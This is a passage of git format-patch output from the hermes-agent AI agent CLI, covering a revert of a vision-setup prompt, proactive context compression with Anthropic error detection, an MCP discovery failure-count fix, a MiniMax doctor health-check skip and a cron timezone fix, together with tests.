-    if selected_provider in ("nous", "nous-api", "openai-codex", "custom", "zai", "kimi-coding", "minimax", "minimax-cn") and not get_env_value("OPENROUTER_API_KEY"):
-        print()
-        print_header("OpenRouter API Key (for tools)")
-        print_info("Tools like vision analysis, web search, and MoA use OpenRouter")
-        print_info("independently of your main inference provider.")
-        print_info("Get your API key at: https://openrouter.ai/keys")
+    # ── Vision & Image Analysis Setup ──
+    # Vision requires a multimodal-capable provider. Check whether the user's
+    # chosen provider already covers it — if so, skip the prompt entirely.
+    _vision_needs_setup = True
 
-        api_key = prompt("  OpenRouter API key (optional, press Enter to skip)", password=True)
-        if api_key:
-            save_env_value("OPENROUTER_API_KEY", api_key)
-            print_success("OpenRouter API key saved (for tools)")
+    if selected_provider == "openrouter":
+        # OpenRouter → Gemini for vision, already configured
+        _vision_needs_setup = False
+    elif selected_provider == "nous":
+        # Nous Portal OAuth → Gemini via Nous, already configured
+        _vision_needs_setup = False
+    elif selected_provider == "openai-codex":
+        # Codex OAuth → gpt-5.3-codex supports vision
+        _vision_needs_setup = False
+    elif selected_provider == "custom":
+        _custom_base = (get_env_value("OPENAI_BASE_URL") or "").lower()
+        if "api.openai.com" in _custom_base:
+            # Direct OpenAI endpoint — show vision model picker
+            print()
+            print_header("Vision Model")
+            print_info("Your OpenAI endpoint supports vision. Pick a model for image analysis:")
+            _oai_vision_models = ["gpt-4o", "gpt-4o-mini", "gpt-4.1", "gpt-4.1-mini", "gpt-4.1-nano"]
+            _vm_choices = _oai_vision_models + [f"Keep default (gpt-4o-mini)"]
+            _vm_idx = prompt_choice("Select vision model:", _vm_choices, len(_vm_choices) - 1)
+            if _vm_idx < len(_oai_vision_models):
+                save_env_value("AUXILIARY_VISION_MODEL", _oai_vision_models[_vm_idx])
+                print_success(f"Vision model set to {_oai_vision_models[_vm_idx]}")
+            _vision_needs_setup = False
+
+    # Even for providers without native vision, check if existing credentials
+    # from a previous setup already cover it (e.g. user had OpenRouter before
+    # switching to z.ai)
+    if _vision_needs_setup:
+        if get_env_value("OPENROUTER_API_KEY"):
+            _vision_needs_setup = False
         else:
-            print_info("Skipped - some tools (vision, web scraping) won't work without this")
+            # Check for Nous Portal OAuth in auth.json
+            try:
+                _auth_path = Path.home() / ".hermes" / "auth.json"
+                if _auth_path.is_file():
+                    import json as _json
+                    _auth_data = _json.loads(_auth_path.read_text())
+                    if _auth_data.get("active_provider") == "nous":
+                        _nous_p = _auth_data.get("providers", {}).get("nous", {})
+                        if _nous_p.get("agent_key") or _nous_p.get("access_token"):
+                            _vision_needs_setup = False
+            except Exception:
+                pass
+
+    if _vision_needs_setup:
+        _prov_names = {
+            "nous-api": "Nous Portal API key",
+            "zai": "Z.AI / GLM",
+            "kimi-coding": "Kimi / Moonshot",
+            "minimax": "MiniMax",
+            "minimax-cn": "MiniMax CN",
+            "custom": "your custom endpoint",
+        }
+        _prov_display = _prov_names.get(selected_provider, selected_provider or "your provider")
+
+        print()
+        print_header("Vision & Image Analysis (optional)")
+        print_info(f"Vision requires a multimodal-capable provider. {_prov_display}")
+        print_info("doesn't natively support it. Choose how to enable vision,")
+        print_info("or skip to configure later.")
+        print()
+
+        _vision_choices = [
+            "OpenRouter — uses Gemini (free tier at openrouter.ai/keys)",
+            "OpenAI — enter API key & choose a vision model",
+            "Skip for now",
+        ]
+        _vision_idx = prompt_choice("Configure vision:", _vision_choices, 2)
+
+        if _vision_idx == 0:  # OpenRouter
+            _or_key = prompt("  OpenRouter API key", password=True)
+            if _or_key:
+                save_env_value("OPENROUTER_API_KEY", _or_key)
+                print_success("OpenRouter key saved — vision will use Gemini")
+            else:
+                print_info("Skipped — vision won't be available")
+        elif _vision_idx == 1:  # OpenAI
+            _oai_key = prompt("  OpenAI API key", password=True)
+            if _oai_key:
+                save_env_value("OPENAI_API_KEY", _oai_key)
+                save_env_value("OPENAI_BASE_URL", "https://api.openai.com/v1")
+                _oai_vision_models = ["gpt-4o", "gpt-4o-mini", "gpt-4.1", "gpt-4.1-mini", "gpt-4.1-nano"]
+                _vm_choices = _oai_vision_models + ["Use default (gpt-4o-mini)"]
+                _vm_idx = prompt_choice("Select vision model:", _vm_choices, 0)
+                if _vm_idx < len(_oai_vision_models):
+                    save_env_value("AUXILIARY_VISION_MODEL", _oai_vision_models[_vm_idx])
+                    print_success(f"Vision configured with OpenAI ({_oai_vision_models[_vm_idx]})")
+                else:
+                    print_success("Vision configured with OpenAI (gpt-4o-mini)")
+            else:
+                print_info("Skipped — vision won't be available")
+        else:
+            print_info("Skipped — add later with 'hermes config set OPENROUTER_API_KEY ...'")
 
     # ── Model Selection (adapts based on provider) ──
     if selected_provider != "custom":  # Custom already prompted for model name

From efb780c754959a70e1423e325bc93d8c9ca832bc Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:59:00 -0700
Subject: [PATCH 094/105] Revert "fix: smart vision setup that respects the
 user's chosen provider"

This reverts commit c64efa92607bf6af0de66236fff93d1b08d34f82.
---
 hermes_cli/setup.py | 141 +++++---------------------------------------
 1 file changed, 15 insertions(+), 126 deletions(-)

diff --git a/hermes_cli/setup.py b/hermes_cli/setup.py
index 1690e48c..c471b1b9 100644
--- a/hermes_cli/setup.py
+++ b/hermes_cli/setup.py
@@ -292,41 +292,12 @@ def _print_setup_summary(config: dict, hermes_home):
     
     tool_status = []
     
-    # Vision — works with OpenRouter, Nous OAuth, Codex OAuth, or OpenAI endpoint
-    _has_vision = False
-    _vision_via = None
+    # OpenRouter (required for vision, moa)
     if get_env_value('OPENROUTER_API_KEY'):
-        _has_vision, _vision_via = True, "OpenRouter/Gemini"
-    else:
-        try:
-            _vauth_path = Path(os.path.expanduser("~/.hermes/auth.json"))
-            if _vauth_path.is_file():
-                import json as _vjson
-                _vauth = _vjson.loads(_vauth_path.read_text())
-                if _vauth.get("active_provider") == "nous":
-                    _np = _vauth.get("providers", {}).get("nous", {})
-                    if _np.get("agent_key") or _np.get("access_token"):
-                        _has_vision, _vision_via = True, "Nous Portal/Gemini"
-                elif _vauth.get("active_provider") == "openai-codex":
-                    _cp = _vauth.get("providers", {}).get("openai-codex", {})
-                    if _cp.get("tokens", {}).get("access_token"):
-                        _has_vision, _vision_via = True, "OpenAI Codex"
-        except Exception:
-            pass
-    if not _has_vision:
-        _oai_base = get_env_value('OPENAI_BASE_URL') or ""
-        if get_env_value('OPENAI_API_KEY') and "api.openai.com" in _oai_base.lower():
-            _has_vision, _vision_via = True, "OpenAI"
-
-    if _has_vision:
         tool_status.append(("Vision (image analysis)", True, None))
-    else:
-        tool_status.append(("Vision (image analysis)", False, "run 'hermes setup' to configure"))
-
-    # Mixture of Agents — requires OpenRouter specifically (calls multiple models)
-    if get_env_value('OPENROUTER_API_KEY'):
         tool_status.append(("Mixture of Agents", True, None))
     else:
+        tool_status.append(("Vision (image analysis)", False, "OPENROUTER_API_KEY"))
         tool_status.append(("Mixture of Agents", False, "OPENROUTER_API_KEY"))
     
     # Firecrawl (web tools)
@@ -918,104 +889,22 @@ def setup_model_provider(config: dict):
 
     # else: provider_idx == 9 (Keep current) — only shown when a provider already exists
 
-    # ── Vision & Image Analysis Setup ──
-    # Vision requires a multimodal-capable provider. Check whether the user's
-    # chosen provider already covers it — if so, skip the prompt entirely.
-    _vision_needs_setup = True
-
-    if selected_provider == "openrouter":
-        # OpenRouter → Gemini for vision, already configured
-        _vision_needs_setup = False
-    elif selected_provider == "nous":
-        # Nous Portal OAuth → Gemini via Nous, already configured
-        _vision_needs_setup = False
-    elif selected_provider == "openai-codex":
-        # Codex OAuth → gpt-5.3-codex supports vision
-        _vision_needs_setup = False
-    elif selected_provider == "custom":
-        _custom_base = (get_env_value("OPENAI_BASE_URL") or "").lower()
-        if "api.openai.com" in _custom_base:
-            # Direct OpenAI endpoint — show vision model picker
-            print()
-            print_header("Vision Model")
-            print_info("Your OpenAI endpoint supports vision. Pick a model for image analysis:")
-            _oai_vision_models = ["gpt-4o", "gpt-4o-mini", "gpt-4.1", "gpt-4.1-mini", "gpt-4.1-nano"]
-            _vm_choices = _oai_vision_models + [f"Keep default (gpt-4o-mini)"]
-            _vm_idx = prompt_choice("Select vision model:", _vm_choices, len(_vm_choices) - 1)
-            if _vm_idx < len(_oai_vision_models):
-                save_env_value("AUXILIARY_VISION_MODEL", _oai_vision_models[_vm_idx])
-                print_success(f"Vision model set to {_oai_vision_models[_vm_idx]}")
-            _vision_needs_setup = False
-
-    # Even for providers without native vision, check if existing credentials
-    # from a previous setup already cover it (e.g. user had OpenRouter before
-    # switching to z.ai)
-    if _vision_needs_setup:
-        if get_env_value("OPENROUTER_API_KEY"):
-            _vision_needs_setup = False
-        else:
-            # Check for Nous Portal OAuth in auth.json
-            try:
-                _auth_path = Path.home() / ".hermes" / "auth.json"
-                if _auth_path.is_file():
-                    import json as _json
-                    _auth_data = _json.loads(_auth_path.read_text())
-                    if _auth_data.get("active_provider") == "nous":
-                        _nous_p = _auth_data.get("providers", {}).get("nous", {})
-                        if _nous_p.get("agent_key") or _nous_p.get("access_token"):
-                            _vision_needs_setup = False
-            except Exception:
-                pass
-
-    if _vision_needs_setup:
-        _prov_names = {
-            "nous-api": "Nous Portal API key",
-            "zai": "Z.AI / GLM",
-            "kimi-coding": "Kimi / Moonshot",
-            "minimax": "MiniMax",
-            "minimax-cn": "MiniMax CN",
-            "custom": "your custom endpoint",
-        }
-        _prov_display = _prov_names.get(selected_provider, selected_provider or "your provider")
-
-        print()
-        print_header("Vision & Image Analysis (optional)")
-        print_info(f"Vision requires a multimodal-capable provider. {_prov_display}")
-        print_info("doesn't natively support it. Choose how to enable vision,")
-        print_info("or skip to configure later.")
+    # ── OpenRouter API Key for tools (if not already set) ──
+    # Tools (vision, web, MoA) use OpenRouter independently of the main provider.
+    # Prompt for OpenRouter key if not set and a non-OpenRouter provider was chosen.
+    if selected_provider in ("nous", "nous-api", "openai-codex", "custom", "zai", "kimi-coding", "minimax", "minimax-cn") and not get_env_value("OPENROUTER_API_KEY"):
         print()
+        print_header("OpenRouter API Key (for tools)")
+        print_info("Tools like vision analysis, web search, and MoA use OpenRouter")
+        print_info("independently of your main inference provider.")
+        print_info("Get your API key at: https://openrouter.ai/keys")
 
-        _vision_choices = [
-            "OpenRouter — uses Gemini (free tier at openrouter.ai/keys)",
-            "OpenAI — enter API key & choose a vision model",
-            "Skip for now",
-        ]
-        _vision_idx = prompt_choice("Configure vision:", _vision_choices, 2)
-
-        if _vision_idx == 0:  # OpenRouter
-            _or_key = prompt("  OpenRouter API key", password=True)
-            if _or_key:
-                save_env_value("OPENROUTER_API_KEY", _or_key)
-                print_success("OpenRouter key saved — vision will use Gemini")
-            else:
-                print_info("Skipped — vision won't be available")
-        elif _vision_idx == 1:  # OpenAI
-            _oai_key = prompt("  OpenAI API key", password=True)
-            if _oai_key:
-                save_env_value("OPENAI_API_KEY", _oai_key)
-                save_env_value("OPENAI_BASE_URL", "https://api.openai.com/v1")
-                _oai_vision_models = ["gpt-4o", "gpt-4o-mini", "gpt-4.1", "gpt-4.1-mini", "gpt-4.1-nano"]
-                _vm_choices = _oai_vision_models + ["Use default (gpt-4o-mini)"]
-                _vm_idx = prompt_choice("Select vision model:", _vm_choices, 0)
-                if _vm_idx < len(_oai_vision_models):
-                    save_env_value("AUXILIARY_VISION_MODEL", _oai_vision_models[_vm_idx])
-                    print_success(f"Vision configured with OpenAI ({_oai_vision_models[_vm_idx]})")
-                else:
-                    print_success("Vision configured with OpenAI (gpt-4o-mini)")
-            else:
-                print_info("Skipped — vision won't be available")
+        api_key = prompt("  OpenRouter API key (optional, press Enter to skip)", password=True)
+        if api_key:
+            save_env_value("OPENROUTER_API_KEY", api_key)
+            print_success("OpenRouter API key saved (for tools)")
         else:
-            print_info("Skipped — add later with 'hermes config set OPENROUTER_API_KEY ...'")
+            print_info("Skipped - some tools (vision, web scraping) won't work without this")
 
     # ── Model Selection (adapts based on provider) ──
     if selected_provider != "custom":  # Custom already prompted for model name

From a54405e339d8a8640a26048710cac6c99fed1c52 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:04:52 -0700
Subject: [PATCH 095/105] fix: proactive compression after large tool results +
 Anthropic error detection
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Two fixes for context overflow handling:

1. Proactive compression after tool execution: The compression check now
   estimates the next prompt size using real token counts from the last API
   response (prompt_tokens + completion_tokens) plus a conservative estimate
   of newly appended tool results (chars // 3 for JSON-heavy content).
   Previously, should_compress() only checked last_prompt_tokens which
   didn't account for tool results — so a 130k prompt + 100k chars of tool
   output would pass the 140k threshold check but fail the 200k API limit.

2. Safety net: Added 'prompt is too long' to context-length error detection
   phrases. Anthropic returns 'prompt is too long: N tokens > M maximum'
   on HTTP 400, which wasn't matched by existing phrases. This ensures
   compression fires even if the proactive check underestimates.

Fixes #813
---
 run_agent.py                  | 17 ++++++++-
 tests/test_413_compression.py | 70 +++++++++++++++++++++++++++++++++++
 2 files changed, 86 insertions(+), 1 deletion(-)

diff --git a/run_agent.py b/run_agent.py
index 7543d1d0..e98863f5 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -3872,6 +3872,7 @@ class AIAgent:
                         'token limit', 'too many tokens', 'reduce the length',
                         'exceeds the limit', 'context window',
                         'request entity too large',  # OpenRouter/Nous 413 safety net
+                        'prompt is too long',  # Anthropic: "prompt is too long: N tokens > M maximum"
                     ])
                     
                     if is_context_length_error:
@@ -4256,6 +4257,7 @@ class AIAgent:
                     
                     messages.append(assistant_msg)
                     
+                    _msg_count_before_tools = len(messages)
                     self._execute_tool_calls(assistant_message, messages, effective_task_id, api_call_count)
 
                     # Refund the iteration if the ONLY tool(s) called were
@@ -4265,7 +4267,20 @@ class AIAgent:
                     if _tc_names == {"execute_code"}:
                         self.iteration_budget.refund()
                     
-                    if self.compression_enabled and self.context_compressor.should_compress():
+                    # Estimate next prompt size using real token counts from the
+                    # last API response + rough estimate of newly appended tool
+                    # results.  This catches cases where tool results push the
+                    # context past the limit that last_prompt_tokens alone misses
+                    # (e.g. large file reads, web extractions).
+                    _compressor = self.context_compressor
+                    _new_tool_msgs = messages[_msg_count_before_tools:]
+                    _new_chars = sum(len(str(m.get("content", "") or "")) for m in _new_tool_msgs)
+                    _estimated_next_prompt = (
+                        _compressor.last_prompt_tokens
+                        + _compressor.last_completion_tokens
+                        + _new_chars // 3  # conservative: JSON-heavy tool results ≈ 3 chars/token
+                    )
+                    if self.compression_enabled and _compressor.should_compress(_estimated_next_prompt):
                         messages, active_system_prompt = self._compress_context(
                             messages, system_message,
                             approx_tokens=self.context_compressor.last_prompt_tokens,
diff --git a/tests/test_413_compression.py b/tests/test_413_compression.py
index 62fee8b8..1736bbde 100644
--- a/tests/test_413_compression.py
+++ b/tests/test_413_compression.py
@@ -396,3 +396,73 @@ class TestPreflightCompression:
             result = agent.run_conversation("hello", conversation_history=big_history)
 
         mock_compress.assert_not_called()
+
+
+class TestToolResultPreflightCompression:
+    """Compression should trigger when tool results push context past the threshold."""
+
+    def test_large_tool_results_trigger_compression(self, agent):
+        """When tool results push estimated tokens past threshold, compress before next call."""
+        agent.compression_enabled = True
+        agent.context_compressor.context_length = 200_000
+        agent.context_compressor.threshold_tokens = 140_000
+        agent.context_compressor.last_prompt_tokens = 130_000
+        agent.context_compressor.last_completion_tokens = 5_000
+
+        tc = SimpleNamespace(
+            id="tc1", type="function",
+            function=SimpleNamespace(name="web_search", arguments='{"query":"test"}'),
+        )
+        tool_resp = _mock_response(
+            content=None, finish_reason="stop", tool_calls=[tc],
+            usage={"prompt_tokens": 130_000, "completion_tokens": 5_000, "total_tokens": 135_000},
+        )
+        ok_resp = _mock_response(
+            content="Done after compression", finish_reason="stop",
+            usage={"prompt_tokens": 50_000, "completion_tokens": 100, "total_tokens": 50_100},
+        )
+        agent.client.chat.completions.create.side_effect = [tool_resp, ok_resp]
+        large_result = "x" * 100_000
+
+        with (
+            patch("run_agent.handle_function_call", return_value=large_result),
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            mock_compress.return_value = (
+                [{"role": "user", "content": "hello"}], "compressed prompt",
+            )
+            result = agent.run_conversation("hello")
+
+        mock_compress.assert_called_once()
+        assert result["completed"] is True
+
+    def test_anthropic_prompt_too_long_safety_net(self, agent):
+        """Anthropic 'prompt is too long' error triggers compression as safety net."""
+        err_400 = Exception(
+            "Error code: 400 - {'type': 'error', 'error': {'type': 'invalid_request_error', "
+            "'message': 'prompt is too long: 233153 tokens > 200000 maximum'}}"
+        )
+        err_400.status_code = 400
+        ok_resp = _mock_response(content="Recovered", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [err_400, ok_resp]
+        prefill = [
+            {"role": "user", "content": "previous"},
+            {"role": "assistant", "content": "answer"},
+        ]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            mock_compress.return_value = (
+                [{"role": "user", "content": "hello"}], "compressed",
+            )
+            result = agent.run_conversation("hello", conversation_history=prefill)
+
+        mock_compress.assert_called_once()
+        assert result["completed"] is True

From 4a8f23eddff6fe0dbe01c4b0ee37efdb06e31f82 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Tue, 10 Mar 2026 02:27:59 +0300
Subject: [PATCH 096/105] fix: correctly track failed MCP server connections in
 discovery

_discover_one() caught all exceptions and returned [], making
asyncio.gather(return_exceptions=True) redundant. The
isinstance(result, Exception) branch in _discover_all() was dead
code, so failed_count was always 0. This caused:
- No summary printed when all servers fail (silent failure)
- ok_servers always equaling total_servers (misleading count)
- Unused variables transport_desc and transport_type

Fix: let exceptions propagate to gather() so failed_count increments
correctly. Move per-server failure logging to _discover_all(). Remove
dead variables.
---
 tests/tools/test_mcp_tool.py | 124 +++++++++++++++++++++++++++++++++++
 tools/mcp_tool.py            |  20 ++----
 2 files changed, 131 insertions(+), 13 deletions(-)

diff --git a/tests/tools/test_mcp_tool.py b/tests/tools/test_mcp_tool.py
index 446f80d3..0f7fc18a 100644
--- a/tests/tools/test_mcp_tool.py
+++ b/tests/tools/test_mcp_tool.py
@@ -2326,3 +2326,127 @@ class TestMCPServerTaskSamplingIntegration:
         kwargs = server._sampling.session_kwargs()
         assert "sampling_callback" in kwargs
         assert "sampling_capabilities" in kwargs
+
+
+# ---------------------------------------------------------------------------
+# Discovery failed_count tracking
+# ---------------------------------------------------------------------------
+
+class TestDiscoveryFailedCount:
+    """Verify discover_mcp_tools() correctly tracks failed server connections."""
+
+    def test_failed_server_increments_failed_count(self):
+        """When _discover_and_register_server raises, failed_count increments."""
+        from tools.mcp_tool import discover_mcp_tools, _servers, _ensure_mcp_loop
+
+        fake_config = {
+            "good_server": {"command": "npx", "args": ["good"]},
+            "bad_server": {"command": "npx", "args": ["bad"]},
+        }
+
+        async def fake_register(name, cfg):
+            if name == "bad_server":
+                raise ConnectionError("Connection refused")
+            # Simulate successful registration
+            from tools.mcp_tool import MCPServerTask
+            server = MCPServerTask(name)
+            server.session = MagicMock()
+            server._tools = [_make_mcp_tool("tool_a")]
+            _servers[name] = server
+            return [f"mcp_{name}_tool_a"]
+
+        with patch("tools.mcp_tool._load_mcp_config", return_value=fake_config), \
+             patch("tools.mcp_tool._discover_and_register_server", side_effect=fake_register), \
+             patch("tools.mcp_tool._MCP_AVAILABLE", True), \
+             patch("tools.mcp_tool._existing_tool_names", return_value=["mcp_good_server_tool_a"]):
+            _ensure_mcp_loop()
+
+            # Capture the logger to verify failed_count in summary
+            with patch("tools.mcp_tool.logger") as mock_logger:
+                discover_mcp_tools()
+
+                # Find the summary info call
+                info_calls = [
+                    str(call)
+                    for call in mock_logger.info.call_args_list
+                    if "failed" in str(call).lower() or "MCP:" in str(call)
+                ]
+                # The summary should mention the failure
+                assert any("1 failed" in str(c) for c in info_calls), (
+                    f"Summary should report 1 failed server, got: {info_calls}"
+                )
+
+        _servers.pop("good_server", None)
+        _servers.pop("bad_server", None)
+
+    def test_all_servers_fail_still_prints_summary(self):
+        """When all servers fail, a summary with failure count is still printed."""
+        from tools.mcp_tool import discover_mcp_tools, _servers, _ensure_mcp_loop
+
+        fake_config = {
+            "srv1": {"command": "npx", "args": ["a"]},
+            "srv2": {"command": "npx", "args": ["b"]},
+        }
+
+        async def always_fail(name, cfg):
+            raise ConnectionError(f"Server {name} refused")
+
+        with patch("tools.mcp_tool._load_mcp_config", return_value=fake_config), \
+             patch("tools.mcp_tool._discover_and_register_server", side_effect=always_fail), \
+             patch("tools.mcp_tool._MCP_AVAILABLE", True), \
+             patch("tools.mcp_tool._existing_tool_names", return_value=[]):
+            _ensure_mcp_loop()
+
+            with patch("tools.mcp_tool.logger") as mock_logger:
+                discover_mcp_tools()
+
+                # Summary must be printed even when all servers fail
+                info_calls = [str(call) for call in mock_logger.info.call_args_list]
+                assert any("2 failed" in str(c) for c in info_calls), (
+                    f"Summary should report 2 failed servers, got: {info_calls}"
+                )
+
+        _servers.pop("srv1", None)
+        _servers.pop("srv2", None)
+
+    def test_ok_servers_excludes_failures(self):
+        """ok_servers count correctly excludes failed servers."""
+        from tools.mcp_tool import discover_mcp_tools, _servers, _ensure_mcp_loop
+
+        fake_config = {
+            "ok1": {"command": "npx", "args": ["ok1"]},
+            "ok2": {"command": "npx", "args": ["ok2"]},
+            "fail1": {"command": "npx", "args": ["fail"]},
+        }
+
+        async def selective_register(name, cfg):
+            if name == "fail1":
+                raise ConnectionError("Refused")
+            from tools.mcp_tool import MCPServerTask
+            server = MCPServerTask(name)
+            server.session = MagicMock()
+            server._tools = [_make_mcp_tool("t")]
+            _servers[name] = server
+            return [f"mcp_{name}_t"]
+
+        with patch("tools.mcp_tool._load_mcp_config", return_value=fake_config), \
+             patch("tools.mcp_tool._discover_and_register_server", side_effect=selective_register), \
+             patch("tools.mcp_tool._MCP_AVAILABLE", True), \
+             patch("tools.mcp_tool._existing_tool_names", return_value=["mcp_ok1_t", "mcp_ok2_t"]):
+            _ensure_mcp_loop()
+
+            with patch("tools.mcp_tool.logger") as mock_logger:
+                discover_mcp_tools()
+
+                info_calls = [str(call) for call in mock_logger.info.call_args_list]
+                # Should say "2 server(s)" not "3 server(s)"
+                assert any("2 server" in str(c) for c in info_calls), (
+                    f"Summary should report 2 ok servers, got: {info_calls}"
+                )
+                assert any("1 failed" in str(c) for c in info_calls), (
+                    f"Summary should report 1 failed, got: {info_calls}"
+                )
+
+        _servers.pop("ok1", None)
+        _servers.pop("ok2", None)
+        _servers.pop("fail1", None)
diff --git a/tools/mcp_tool.py b/tools/mcp_tool.py
index b0fc35f7..94495430 100644
--- a/tools/mcp_tool.py
+++ b/tools/mcp_tool.py
@@ -1331,29 +1331,23 @@ def discover_mcp_tools() -> List[str]:
 
     async def _discover_one(name: str, cfg: dict) -> List[str]:
         """Connect to a single server and return its registered tool names."""
-        transport_desc = cfg.get("url", f'{cfg.get("command", "?")} {" ".join(cfg.get("args", [])[:2])}')
-        try:
-            registered = await _discover_and_register_server(name, cfg)
-            transport_type = "HTTP" if "url" in cfg else "stdio"
-            return registered
-        except Exception as exc:
-            logger.warning(
-                "Failed to connect to MCP server '%s': %s",
-                name, exc,
-            )
-            return []
+        return await _discover_and_register_server(name, cfg)
 
     async def _discover_all():
         nonlocal failed_count
+        server_names = list(new_servers.keys())
         # Connect to all servers in PARALLEL
         results = await asyncio.gather(
             *(_discover_one(name, cfg) for name, cfg in new_servers.items()),
             return_exceptions=True,
         )
-        for result in results:
+        for name, result in zip(server_names, results):
             if isinstance(result, Exception):
                 failed_count += 1
-                logger.warning("MCP discovery error: %s", result)
+                logger.warning(
+                    "Failed to connect to MCP server '%s': %s",
+                    name, result,
+                )
             elif isinstance(result, list):
                 all_tools.extend(result)
             else:

From b4a100dfc07de995537723293e5b8195fbe9efda Mon Sep 17 00:00:00 2001
From: Bartok9 <259807879+Bartok9@users.noreply.github.com>
Date: Wed, 11 Mar 2026 08:29:35 -0700
Subject: [PATCH 097/105] fix(doctor): skip /models health check for MiniMax
 providers

MiniMax APIs (global and China) don't support /v1/models, causing
hermes doctor to always show HTTP 404 even with valid API keys.
Skip the HTTP check for these providers and show '(key configured)'
when the API key is present.

Cherry-picked from PR #822 by Bartok9, rebased onto current main.

Fixes #811

Co-authored-by: Bartok9 <259807879+Bartok9@users.noreply.github.com>
---
 hermes_cli/doctor.py | 17 ++++++++++++-----
 1 file changed, 12 insertions(+), 5 deletions(-)

diff --git a/hermes_cli/doctor.py b/hermes_cli/doctor.py
index de55bdff..a10f249b 100644
--- a/hermes_cli/doctor.py
+++ b/hermes_cli/doctor.py
@@ -490,13 +490,16 @@ def run_doctor(args):
             print(f"\r  {color('⚠', Colors.YELLOW)} Anthropic API {color(f'({e})', Colors.DIM)}                 ")
 
     # -- API-key providers (Z.AI/GLM, Kimi, MiniMax, MiniMax-CN) --
+    # Tuple: (name, env_vars, default_url, base_env, supports_models_endpoint)
+    # If supports_models_endpoint is False, we skip the health check and just show "configured"
     _apikey_providers = [
-        ("Z.AI / GLM",      ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY"), "https://api.z.ai/api/paas/v4/models", "GLM_BASE_URL"),
-        ("Kimi / Moonshot",  ("KIMI_API_KEY",),                              "https://api.moonshot.ai/v1/models",   "KIMI_BASE_URL"),
-        ("MiniMax",          ("MINIMAX_API_KEY",),                            "https://api.minimax.io/v1/models",    "MINIMAX_BASE_URL"),
-        ("MiniMax (China)",  ("MINIMAX_CN_API_KEY",),                         "https://api.minimaxi.com/v1/models",  "MINIMAX_CN_BASE_URL"),
+        ("Z.AI / GLM",      ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY"), "https://api.z.ai/api/paas/v4/models", "GLM_BASE_URL", True),
+        ("Kimi / Moonshot",  ("KIMI_API_KEY",),                              "https://api.moonshot.ai/v1/models",   "KIMI_BASE_URL", True),
+        # MiniMax APIs don't support /models endpoint — https://github.com/NousResearch/hermes-agent/issues/811
+        ("MiniMax",          ("MINIMAX_API_KEY",),                            None,                                  "MINIMAX_BASE_URL", False),
+        ("MiniMax (China)",  ("MINIMAX_CN_API_KEY",),                         None,                                  "MINIMAX_CN_BASE_URL", False),
     ]
-    for _pname, _env_vars, _default_url, _base_env in _apikey_providers:
+    for _pname, _env_vars, _default_url, _base_env, _supports_health_check in _apikey_providers:
         _key = ""
         for _ev in _env_vars:
             _key = os.getenv(_ev, "")
@@ -504,6 +507,10 @@ def run_doctor(args):
                 break
         if _key:
             _label = _pname.ljust(20)
+            # Some providers (like MiniMax) don't support /models endpoint
+            if not _supports_health_check:
+                print(f"  {color('✓', Colors.GREEN)} {_label} {color('(key configured)', Colors.DIM)}")
+                continue
             print(f"  Checking {_pname} API...", end="", flush=True)
             try:
                 import httpx

From 605ba4adea51af2580f1ab94fd6372e873c108e7 Mon Sep 17 00:00:00 2001
From: 0xNyk <0xNyk@users.noreply.github.com>
Date: Wed, 11 Mar 2026 08:38:24 -0700
Subject: [PATCH 098/105] fix(cron): interpret naive timestamps as local time
 in due-job checks
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Legacy cron job rows may store next_run_at without timezone info.
_ensure_aware() previously stamped the Hermes-configured tz directly
via replace(tzinfo=...), which shifts absolute time when system-local
tz differs from Hermes tz — causing overdue jobs to appear not due.

Now: naive datetimes are interpreted as system-local wall time first,
then converted to Hermes tz. Aware datetimes are normalized to Hermes
tz for consistency.

Cherry-picked from PR #807, rebased onto current main.
Fixes #806

Co-authored-by: 0xNyk <0xNyk@users.noreply.github.com>
---
 cron/jobs.py | 20 +++++++++++++-------
 1 file changed, 13 insertions(+), 7 deletions(-)

diff --git a/cron/jobs.py b/cron/jobs.py
index 0c062cfe..6cbb168f 100644
--- a/cron/jobs.py
+++ b/cron/jobs.py
@@ -168,16 +168,22 @@ def parse_schedule(schedule: str) -> Dict[str, Any]:
 
 
 def _ensure_aware(dt: datetime) -> datetime:
-    """Make a naive datetime tz-aware using the configured timezone.
+    """Return a timezone-aware datetime in Hermes configured timezone.
 
-    Handles backward compatibility: timestamps stored before timezone support
-    are naive (server-local).  We assume they were in the same timezone as
-    the current configuration so comparisons work without crashing.
+    Backward compatibility:
+    - Older stored timestamps may be naive.
+    - Naive values are interpreted as *system-local wall time* (the timezone
+      `datetime.now()` used when they were created), then converted to the
+      configured Hermes timezone.
+
+    This preserves relative ordering for legacy naive timestamps across
+    timezone changes and avoids false not-due results.
     """
+    target_tz = _hermes_now().tzinfo
     if dt.tzinfo is None:
-        tz = _hermes_now().tzinfo
-        return dt.replace(tzinfo=tz)
-    return dt
+        local_tz = datetime.now().astimezone().tzinfo
+        return dt.replace(tzinfo=local_tz).astimezone(target_tz)
+    return dt.astimezone(target_tz)
 
 
 def compute_next_run(schedule: Dict[str, Any], last_run_at: Optional[str] = None) -> Optional[str]:

From a5ffa1278c987dda5e551fb8772d5e75c67d3869 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:42:04 -0700
Subject: [PATCH 099/105] test(cron): add regression tests for _ensure_aware
 timezone conversion

Three new tests for the naive timestamp fix (PR #807):
- test_ensure_aware_naive_preserves_absolute_time: verifies UTC equivalent
  is preserved when interpreting naive datetimes as system-local time
- test_ensure_aware_normalizes_aware_to_hermes_tz: verifies already-aware
